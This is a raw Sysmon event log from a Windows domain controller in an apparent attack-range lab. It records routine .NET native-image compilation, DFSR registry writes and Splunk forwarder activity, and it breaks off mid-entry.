21:02:56.515{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A180-60D3-1C03-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.515{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A180-60D3-1C03-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 13241300x800000000000000019871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:02:56.203{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x800000000000000019870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:02:56.203{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9F667F05-E98B-4538-82BE-6312C93AD303\Config SourceDWORD (0x00000001) 13241300x800000000000000019869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:02:56.203{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9F667F05-E98B-4538-82BE-6312C93AD303\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_9F667F05-E98B-4538-82BE-6312C93AD303.XML 10341000x800000000000000019868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.031{4DB9351A-A17F-60D3-1903-00000000CF01}69086604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.015{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A180-60D3-1B03-00000000CF01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.999{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A180-60D3-1B03-00000000CF01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.999{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A180-60D3-1B03-00000000CF01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.702{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A181-60D3-2103-00000000CF01}7036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.702{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5CA21E0D91C8F82A3DF9D1DF96D7BBD,SHA256=8EEDD9D2B0F9E64D5C0B53FFEFEC197EFF0C2A869966892CDDDA739A6BFF0BD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.687{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-2103-00000000CF01}7036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.687{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A181-60D3-2103-00000000CF01}7036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A181-60D3-2003-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.499{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-2003-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.499{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A181-60D3-2003-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.499{4DB9351A-A181-60D3-1D03-00000000CF01}53486928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.438{4DB9351A-A181-60D3-1F03-00000000CF01}6556NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SZAQ2XLZUQ\System.Runtime.WindowsRuntime.UI.Xaml.ni.dll.auxMD5=D4E5F3E526F65AB1C0B43938D624EA47,SHA256=3F23BFC8C144DBA32D1F86666465F421A00835DEA0D7E468BA33935838716C7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.421{4DB9351A-A181-60D3-1F03-00000000CF01}6556NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SZAQ2XLZUQ\System.Runtime.WindowsRuntime.UI.Xaml.ni.dllMD5=93A40B51D63FFDAB85AC03509209B0C3,SHA256=94A3DE19B46B9B1F6FD4FC8B159737B667A68ECB51E83E246F9497E5C569BB24,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:57.406{4DB9351A-A181-60D3-1F03-00000000CF01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\199c-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-06-23 21:02:57.406 10341000x800000000000000019895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.281{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A181-60D3-1F03-00000000CF01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.252{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-1F03-00000000CF01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.252{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A181-60D3-1F03-00000000CF01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.156{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A181-60D3-1E03-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.140{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-1E03-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.124{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A181-60D3-1E03-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A181-60D3-1D03-00000000CF01}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdl